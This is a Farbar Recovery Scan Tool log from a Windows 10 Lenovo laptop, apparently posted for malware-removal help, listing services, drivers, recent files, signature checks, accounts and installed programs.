R2 LsvUIService; C:\Program Files (x86)\Lenovo\Lenovo Smart Voice\LsvUIService.exe [70416 2013-10-26] (Lenovo)
S3 MessagingService; C:\Windows\System32\MessagingService.dll [52224 2016-07-16] (Microsoft Corporation)
S3 MessagingService_552b6; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
S3 MessagingService_552b6; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 Motorola Device Manager; C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe [137528 2014-04-08] (Motorola Mobility LLC)
R2 NitroDriverReadSpool8; C:\Program Files\Common Files\Nitro\Pro\8.0\NitroPDFDriverService8x64.exe [230408 2013-06-28] (Nitro PDF Software)
R2 OneSyncSvc_552b6; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R2 OneSyncSvc_552b6; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 PGService; C:\Program Files (x86)\Lenovo\Motion Control\PGService.exe [162600 2013-08-29] (PointGrab LTD)
R2 PhoneCompanionPusher; C:\Program Files\Lenovo Yoga PhoneCompanion\PhoneCompanionPusher.exe [249872 2013-10-26] (Lenovo)
S3 PhoneCompanionVap; C:\Program Files\Lenovo Yoga PhoneCompanion\PhoneCompanionVap.exe [328720 2013-10-26] (Lenovo)
R3 PimIndexMaintenanceSvc_552b6; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R3 PimIndexMaintenanceSvc_552b6; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 PST Service; C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe [65657 2011-09-02] (Motorola) [File not signed]
R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [390632 2012-04-24] ()
S3 RmSvc; C:\Windows\System32\RMapi.dll [140800 2016-09-15] (Microsoft Corporation)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [288472 2013-09-13] (Realtek Semiconductor)
S4 shpamsvc; C:\Windows\system32\Windows.SharedPC.AccountManager.dll [161792 2016-07-16] (Microsoft Corporation)
R2 SoftshieldService; C:\Program Files (x86)\Examsoft\Softest 11.0\Examsoft.ShieldRunner.exe [67848 2016-11-02] (Hewlett-Packard)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [249032 2015-06-03] (Synaptics Incorporated)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [6942480 2016-03-02] (TeamViewer GmbH)
S3 TieringEngineService; C:\Windows\system32\TieringEngineService.exe [287744 2016-07-16] (Microsoft Corporation)
R3 TimeBrokerSvc; C:\Windows\System32\TimeBrokerServer.dll [177664 2016-07-16] (Microsoft Corporation)
S4 tzautoupdate; C:\Windows\system32\tzautoupdate.dll [95232 2016-09-24] (Microsoft Corporation)
R3 UnistoreSvc_552b6; C:\WINDOWS\System32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R3 UnistoreSvc_552b6; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R3 UserDataSvc_552b6; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R3 UserDataSvc_552b6; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
S3 vmicrdv; C:\Windows\System32\icsvcext.dll [349696 2016-09-15] (Microsoft Corporation)
S3 vmicvss; C:\Windows\System32\icsvcext.dll [349696 2016-09-15] (Microsoft Corporation)
S4 VPNUnlimitedService; C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe [61808 2015-09-23] (KeepSolid Inc.)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
S3 wisvc; C:\Windows\system32\flightsettings.dll [635904 2016-11-02] (Microsoft Corporation)
S3 WpnUserService; C:\Windows\System32\WpnUserService.dll [74240 2016-07-16] (Microsoft Corporation)
S3 WpnUserService_552b6; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
S3 WpnUserService_552b6; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 ymc; C:\ProgramData\LenovoTransition\Server\x64\ymc.exe [32016 2013-10-26] (Lenovo)
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AcpiDev; C:\Windows\System32\drivers\AcpiDev.sys [18432 2016-07-16] (Microsoft Corporation)
S3 applockerfltr; C:\Windows\System32\drivers\applockerfltr.sys [15360 2016-07-16] (Microsoft Corporation)
S0 b06bdrv; C:\Windows\System32\drivers\bxvbda.sys [533856 2016-07-16] (QLogic Corporation)
S3 bcmfn; C:\Windows\System32\drivers\bcmfn.sys [9728 2016-07-16] (Windows (R) Win 7 DDK provider)
S2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [154680 2016-01-07] (BlueStack Systems)
R3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [168448 2016-09-15] (Microsoft Corporation)
R3 BthHFAud; C:\Windows\System32\drivers\BthHfAud.sys [37376 2016-07-16] (Microsoft Corporation)
R3 BthLEEnum; C:\Windows\System32\drivers\BthLEEnum.sys [249856 2016-09-15] (Microsoft Corporation)
S3 cht4iscsi; C:\Windows\System32\drivers\cht4sx64.sys [346976 2016-07-16] (Chelsio Communications)
S3 cht4vbd; C:\Windows\System32\drivers\cht4vx64.sys [2104160 2016-07-16] (Chelsio Communications)
R2 clreg; C:\Windows\System32\drivers\registry.sys [70144 2016-07-16] (Microsoft Corporation)
R3 DptfDevPch; C:\Windows\system32\DRIVERS\DptfDevPch.sys [114680 2013-08-02] (Intel Corporation)
R3 DptfDevProc; C:\Windows\system32\DRIVERS\DptfDevProc.sys [287160 2013-08-02] (Intel Corporation)
R3 DptfManager; C:\Windows\system32\DRIVERS\DptfManager.sys [494272 2013-08-02] (Intel Corporation)
S3 hvservice; C:\Windows\System32\drivers\hvservice.sys [73568 2016-09-24] (Microsoft Corporation)
S3 iagpio; C:\Windows\System32\drivers\iagpio.sys [33280 2016-07-16] (Intel(R) Corporation)
S3 iai2c; C:\Windows\System32\drivers\iai2c.sys [81408 2016-07-16] (Intel(R) Corporation)
S3 iaLPSS2i_GPIO2; C:\Windows\System32\drivers\iaLPSS2i_GPIO2.sys [64512 2016-07-16] (Intel Corporation)
S3 iaLPSS2i_I2C; C:\Windows\System32\drivers\iaLPSS2i_I2C.sys [176384 2016-07-16] (Intel Corporation)
R3 ibtusb; C:\Windows\system32\DRIVERS\ibtusb.sys [231168 2017-01-13] (Intel Corporation)
R3 ikbevent; C:\Windows\system32\DRIVERS\ikbevent.sys [21408 2013-08-01] ()
R3 imsevent; C:\Windows\system32\DRIVERS\imsevent.sys [21920 2013-08-01] ()
S3 IndirectKmd; C:\Windows\System32\drivers\IndirectKmd.sys [35840 2016-07-16] (Microsoft Corporation)
R0 iorate; C:\Windows\System32\drivers\iorate.sys [48992 2016-11-02] (Microsoft Corporation)
R3 ISCT; C:\Windows\System32\drivers\ISCTD64.sys [46568 2013-08-01] ()
S0 megasas2i; C:\Windows\System32\drivers\MegaSas2i.sys [64352 2016-10-05] (Avago Technologies)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [99288 2013-12-20] (Intel Corporation)
S3 NetAdapterCx; C:\Windows\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R3 NETwNb64; C:\Windows\System32\drivers\Netwbw02.sys [3485696 2016-07-16] (Intel Corporation)
S0 percsas2i; C:\Windows\System32\drivers\percsas2i.sys [58720 2016-07-16] (Avago Technologies)
R3 rtsuvc; C:\Windows\system32\DRIVERS\rtsuvc.sys [8247640 2013-07-19] (Realtek Semiconductor Corp.)
S0 scmbus; C:\Windows\System32\drivers\scmbus.sys [88416 2016-07-16] (Microsoft Corporation)
S3 scmdisk0101; C:\Windows\System32\drivers\scmdisk0101.sys [123904 2016-07-16] (Microsoft Corporation)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-06-03] (Synaptics Incorporated)
S3 UcmTcpciCx0101; C:\Windows\System32\Drivers\UcmTcpciCx.sys [108544 2016-07-16] (Microsoft Corporation)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [45568 2016-07-16] (Microsoft Corporation)
S3 vmgid; C:\Windows\System32\drivers\vmgid.sys [10240 2016-07-16] (Microsoft Corporation)
R0 volume; C:\Windows\System32\drivers\volume.sys [16224 2016-07-16] (Microsoft Corporation)
R2 wcifs; C:\Windows\system32\drivers\wcifs.sys [119648 2016-09-15] (Microsoft Corporation)
R2 wcnfs; C:\Windows\system32\drivers\wcnfs.sys [66560 2016-07-16] (Microsoft Corporation)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
S3 wsvd; C:\Windows\system32\DRIVERS\wsvd.sys [102376 2012-06-13] ("CyberLink)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

NETSVC: shpamsvc -> C:\Windows\system32\Windows.SharedPC.AccountManager.dll (Microsoft Corporation)
NETSVC: WpnService -> C:\Windows\system32\WpnService.dll (Microsoft Corporation)
NETSVC: wisvc -> C:\Windows\system32\flightsettings.dll (Microsoft Corporation)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-03-03 16:49 - 2017-03-03 16:49 - 00000000 ____D C:\WINDOWS\Panther
2017-03-02 21:29 - 2017-03-02 21:29 - 00000000 ____D C:\WINDOWS\LastGood.Tmp
2017-03-01 14:20 - 2017-03-01 14:20 - 00000336 _____ C:\Users\007\Desktop\SHIVANG.txt
2017-03-01 14:18 - 2017-03-01 14:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KeyFinder
2017-03-01 14:18 - 2017-03-01 14:18 - 00000000 ____D C:\Program Files (x86)\Magical Jelly Bean
2017-03-01 14:16 - 2017-03-01 14:16 - 00321324 _____ C:\WINDOWS\Minidump\030117-8218-01.dmp
2017-02-27 19:16 - 2017-03-03 16:44 - 00000000 ____D C:\ProgramData\ea2cb491
2017-02-27 19:16 - 2017-02-27 19:16 - 00003968 _____ C:\WINDOWS\System32\Tasks\{8A254196-3D8E-F63D-E565-AD7C49709C85}
2017-02-27 14:59 - 2017-03-03 16:49 - 00008630 _____ C:\WINDOWS\PFRO.log
2017-02-26 08:58 - 2017-02-26 08:58 - 00086646 _____ C:\Users\007\Downloads\Formula1.2016.Round21.Abu_Dhabi.Race.Build-Up.SkySportsF1.720p.H265.English.torrent
2017-02-26 07:23 - 2017-02-26 07:23 - 08176017 _____ C:\Users\007\Downloads\InfectionControl2015.zip
2017-02-26 07:23 - 2017-02-26 07:23 - 02352528 _____ C:\Users\007\Downloads\Rotator-and-Student-Orientation.zip
2017-02-24 06:11 - 2017-02-24 06:11 - 01072128 _____ C:\Users\007\Downloads\checklist-2-armed-rct_default.ppt
2017-02-21 20:15 - 2017-02-26 07:26 - 00000000 ____D C:\Users\007\Desktop\HAV lecture
2017-02-19 21:58 - 2017-02-19 22:12 - 00000000 ____D C:\Users\007\Desktop\AIMCC
2017-02-07 22:53 - 2017-02-07 22:53 - 00000000 ____D C:\Users\007\Desktop\radio
2017-02-07 22:53 - 2017-02-07 22:53 - 00000000 ____D C:\Users\007\Desktop\radio
2017-02-02 20:08 - 2017-03-02 21:29 - 00003452 _____ C:\WINDOWS\setupact.log
2017-02-02 20:08 - 2017-03-02 21:29 - 00000464 _____ C:\WINDOWS\setuperr.log

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-03-03 16:52 - 2017-01-22 19:44 - 00035447 _____ C:\Users\007\Desktop\FRST.txt
2017-03-03 16:52 - 2017-01-22 19:44 - 00000000 ____D C:\FRST
2017-03-03 16:50 - 2017-01-27 19:11 - 00000275 _____ C:\WINDOWS\WindowsUpdate.log
2017-03-03 16:50 - 2016-09-23 22:06 - 00000000 ____D C:\Users\007
2017-03-03 16:50 - 2016-09-23 22:03 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-03-03 16:50 - 2016-02-06 00:11 - 00000000 ____D C:\Temp
2017-03-03 16:50 - 2016-01-03 18:52 - 00000258 __RSH C:\ProgramData\ntuser.pol
2017-03-03 16:49 - 2016-09-23 22:16 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-03-03 16:49 - 2016-07-16 05:47 - 00000000 ____D C:\WINDOWS\system32\sru
2017-03-03 16:49 - 2016-07-16 00:04 - 01048576 _____ C:\WINDOWS\system32\config\BBI
2017-03-03 16:34 - 2016-08-07 10:18 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-03-03 16:32 - 2016-09-23 22:02 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-03-03 12:27 - 2016-11-28 15:49 - 00004148 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{88938F53-F35B-46C3-83EF-574C9ECB74F2}
2017-03-03 12:25 - 2016-07-16 05:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-03-03 06:48 - 2015-11-08 02:11 - 00000000 ____D C:\Users\007\AppData\Roaming\vlc
2017-03-01 18:24 - 2016-07-29 22:30 - 04598902 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-03-01 14:36 - 2015-11-07 23:14 - 00000000 ____D C:\Program Files\Microsoft Office 15
2017-03-01 14:16 - 2016-10-07 07:11 - 00000000 ____D C:\WINDOWS\Minidump
2017-02-27 19:16 - 2017-01-23 19:21 - 00000000 ____D C:\ProgramData\{75B3123D-C218-A596-FE55-6B3AE26A02BB}
2017-02-27 19:16 - 2017-01-23 19:16 - 00000000 ____D C:\ProgramData\{33B94F1E-8412-F8B5-202E-AD1CD3E2D668}
2017-02-27 19:16 - 2016-09-23 22:16 - 00003878 _____ C:\WINDOWS\System32\Tasks\{1C4B8B9E-DE5F-6DE8-65E2-49D96144215A}
2017-02-27 14:58 - 2016-02-01 10:34 - 00000000 ____D C:\Users\007\AppData\Roaming\Rsupport
2017-02-27 14:56 - 2017-01-29 10:15 - 00000000 ____D C:\Program Files (x86)\NirSoft
2017-02-27 14:54 - 2016-07-16 05:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-02-27 14:54 - 2016-07-16 05:47 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-02-26 09:08 - 2015-11-07 19:56 - 00000000 ____D C:\Users\007\AppData\Local\Packages
2017-02-23 18:20 - 2015-12-14 00:21 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-02-23 00:27 - 2015-11-08 00:08 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-02-23 00:23 - 2015-11-08 00:08 - 138020592 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-02-22 23:59 - 2016-12-12 13:37 - 00003270 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-02-22 23:59 - 2016-07-29 22:50 - 00002372 _____ C:\Users\007\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-02-22 23:59 - 2016-07-29 22:50 - 00000000 ___RD C:\Users\007\OneDrive
2017-02-21 18:48 - 2016-07-16 05:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-02-19 15:09 - 2016-01-02 19:22 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2017-02-06 13:48 - 2016-07-16 05:49 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-02-06 13:48 - 2016-07-16 05:49 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-02-02 19:58 - 2017-01-22 19:55 - 00002283 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-02-02 19:58 - 2017-01-22 19:55 - 00002271 _____ C:\Users\Public\Desktop\Google Chrome.lnk

==================== Files in the root of some directories =======

2015-11-07 22:31 - 2015-11-07 22:31 - 20320792 _____ (LastPass) C:\Program Files (x86)\Common Files\lpuninstall.exe
2015-11-07 19:57 - 2015-11-10 22:55 - 0012093 _____ () C:\Users\007\AppData\Roaming\AbsoluteReminder.xml
2016-01-03 21:17 - 2016-05-31 19:22 - 0000600 _____ () C:\Users\007\AppData\Local\PUTTY.RND
2016-09-23 22:04 - 2016-09-23 22:04 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Some files in TEMP:
====================
C:\Users\007\AppData\Local\Temp\iv_uninstall.exe


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2017-02-21 22:59

==================== End of FRST.txt ============================

 

[shivmister]

Additional scan result of Farbar Recovery Scan Tool (x64) Version:04-10-2015
Ran by 007 (2017-03-03 16:52:54)
Running from C:\Users\007\Desktop
Windows 10 Home (X64) (2016-09-24 04:17:52)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

007 (S-1-5-21-3283718265-1983809055-1317204610-1001 - Administrator - Enabled) => C:\Users\007
Administrator (S-1-5-21-3283718265-1983809055-1317204610-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3283718265-1983809055-1317204610-503 - Limited - Disabled)
Guest (S-1-5-21-3283718265-1983809055-1317204610-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Absolute Reminder (HKLM-x32\...\{40F4FF7A-B214-4453-B973-080B09CED019}) (Version: 2.3.0.1 - Absolute Software)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.023.20070 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 24.0.0.180 - Adobe Systems Incorporated)
AirDroid 3.2.2.0 (HKLM-x32\...\AirDroid) (Version: 3.2.2.0 - Sand Studio)
Apple Application Support (32-bit) (HKLM-x32\...\{F2871C89-C8A5-42EE-8D45-0F02506385A6}) (Version: 5.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{9BC93467-75D1-4AA4-BD58-D9C51D88DFAB}) (Version: 5.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{55BB2110-FB43-49B3-93F4-945A0CFB0A6C}) (Version: 10.0.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
BlackChipPoker (HKLM-x32\...\FE4D6F94-B3D5-484b-94F7-8BC45DEB7A82) (Version: 16.6 - IGSoft)
BlueStacks App Player (HKLM-x32\...\{4047E0FE-CBD8-4915-BBB1-45F6CBF417AC}) (Version: 2.0.4.5627 - BlueStack Systems, Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.26 - Piriform)
Classic Shell (HKLM\...\{D4B3454F-7529-4F5F-851D-2C36933F7D64}) (Version: 4.2.5 - IvoSoft)
CuteFTP 8 Professional (HKLM-x32\...\{91F34319-08DE-457a-99C0-0BCDFAC145B9}) (Version: 8.3.4 - GlobalSCAPE)
CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.0.2810 - CyberLink Corp.)
CyberLink PowerDirector 10 (Version: 10.0.0.2810 - CyberLink Corp.) Hidden
Dolby Digital Plus Home Theater (HKLM\...\{7E3D8FA1-6092-469A-955B-68FC4A2C67CA}) (Version: 7.3.2.2 - Dolby Laboratories Inc)
Dragon Assistant Application en-US version 1.5.8 (HKLM-x32\...\{1CCBE73F-4948-4711-8D12-22E2FD65D706}_is1) (Version: 1.5.8 - Nuance Communications, Inc.)
Dragon Assistant Core Recognition Service version 1.1.10 (HKLM-x32\...\{E97BA7A6-46FC-4EBF-B24A-B8362948C696}_is1) (Version: 1.1.10 - Nuance Communications, Inc.)
Dragon Assistant Installer version 1.5.8 (HKLM-x32\...\{D57A8269-3BE5-4D10-B882-64D0F2D448BF}_is1) (Version: 1.5.8 - Nuance Communications, Inc.)
Dragon Assistant Language Data en-US version 1.1.3 (HKLM-x32\...\{4C0C1E4E-D3B1-4496-98EC-DA14D45EC855}_is1) (Version: 1.1.3 - Nuance Communications, Inc.)
DVD Decrypter (Remove Only) (HKLM-x32\...\DVD Decrypter) (Version: - )
DVD Shrink 3.2 (HKLM-x32\...\DVD Shrink_is1) (Version: - DVD Shrink)
Easy2Convert PIC to JPG 2.2.1 (HKLM-x32\...\{958D3CE0-3C49-40F1-B2EF-14D8FAED7303}_is1) (Version: 2.2.1 - Easy2Convert Software)
Energy Manager (HKLM-x32\...\InstallShield_{AC768037-7079-4658-AC24-2897650E0ABE}) (Version: 1.0.1.38 - Lenovo)
Energy Manager (x32 Version: 1.0.1.38 - Lenovo) Hidden
FileZilla Client 3.14.1 (HKLM-x32\...\FileZilla Client) (Version: 3.14.1 - Tim Kosse)
Foxit PhantomPDF Business (HKLM-x32\...\{05594894-9B62-4D66-BC12-4DA14CA22F28}) (Version: 7.3.6.321 - Foxit Software Inc.)
Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 7.2.8.1124 - Foxit Software Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 56.0.2924.87 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
HandBrake 0.10.5 (HKLM-x32\...\HandBrake) (Version: 0.10.5 - )
Intel Experience Center - Configuration (x32 Version: 1.7.0.179 - Intel) Hidden
Intel(R) Dynamic Platform and Thermal Framework (HKLM-x32\...\FFD10ECE-F715-4a86-9BD8-F6F47DA5DA1C) (Version: 7.1.0.2103 - Intel Corporation)
Intel(R) Experience Center Desktop Software (HKLM-x32\...\{3608ec0a-56b4-4d9d-b038-9b3e51d72582}) (Version: 1.7.0.179 - Intel)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.13.1706 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
Intel(R) PROSet/Wireless Software for Bluetooth(R) Technology(patch version 3.0.1337.1) (HKLM\...\{302600C1-6BDF-4FD1-1307-148929CC1385}) (Version: 3.1.1307.0362 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation)
Intel(R) Smart Connect Technology (HKLM\...\{D6FBF816-ACB8-46CC-ACC6-C8BBA85F497D}) (Version: 4.2.40.2418 - Intel Corporation)
Intel(R) Update Manager (x32 Version: 1.6.2.69 - Intel Corporation) Hidden
Intel® PROSet/Wireless Software (HKLM-x32\...\{e1172fd4-a6d9-4cfa-8256-268f728fec31}) (Version: 16.5.3 - Intel Corporation)
iTunes (HKLM\...\{554C62C7-E6BB-40F1-892B-F0AE02D3C135}) (Version: 12.5.3.17 - Apple Inc.)
Java 8 Update 101 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180101F0}) (Version: 8.0.1010.13 - Oracle Corporation)
Java SE Development Kit 8 Update 101 (HKLM-x32\...\{32A3A4F4-B792-11D6-A78A-00B0D0180101}) (Version: 8.0.1010.13 - Oracle Corporation)
LastPass (uninstall only) (HKLM-x32\...\LastPass) (Version: - LastPass)
Lenovo App Shop (HKLM-x32\...\Lenovo App Shop 45246) (Version: 3.10.0.45246.24 - Lenovo)
Lenovo EasyCamera (HKLM-x32\...\{E0A7ED39-8CD6-4351-93C3-69CCA00D12B4}) (Version: 6.2.9200.10240 - Realtek Semiconductor Corp.)
Lenovo Motion Control (HKLM-x32\...\InstallShield_{A800D2BF-2F0D-4899-B265-C91C90981E8C}) (Version: 2.0.0.0829 - PointGrab)
Lenovo Motion Control (x32 Version: 2.0.0.0829 - PointGrab) Hidden
Lenovo OneKey Recovery (HKLM-x32\...\InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.0.0.2105 - CyberLink Corp.)
Lenovo OneKey Recovery (Version: 8.0.0.2105 - CyberLink Corp.) Hidden
Lenovo Smart Voice (HKLM\...\Lenovo SmartVoice) (Version: 1.0.2.0 - Lenovo)
Lenovo Transition (HKLM\...\Lenovo Transition) (Version: 2.0.13.8211 - Lenovo)
Lenovo Yoga PhoneCompanion (HKLM-x32\...\InstallShield_{0F82EA83-B0C5-4AB9-9695-DFE92C5FD57B}) (Version: 1.1.9.3 - Lenovo)
Lenovo Yoga PhoneCompanion (x32 Version: 1.1.9.3 - Lenovo) Hidden
Magic ISO Maker v5.5 (build 0281) (HKLM-x32\...\Magic ISO Maker v5.5 (build 0281)) (Version: - )
Magical Jelly Bean KeyFinder (HKLM-x32\...\KeyFinder_is1) (Version: 2.0.10.12 - Magical Jelly Bean)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft Office Professional Plus 2013 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 15.0.4903.1002 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\OneDriveSetup.exe) (Version: 17.3.6798.0207 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
mIRC (HKLM-x32\...\mIRC) (Version: 7.43 - mIRC Co. Ltd.)
Motorola Device Manager (HKLM-x32\...\{28DB8373-C1BB-444F-A427-A55585A12ED7}) (Version: 2.5.4 - Motorola Mobility)
Motorola Device Software Update (x32 Version: 13.09.3001 - Motorola Mobility) Hidden
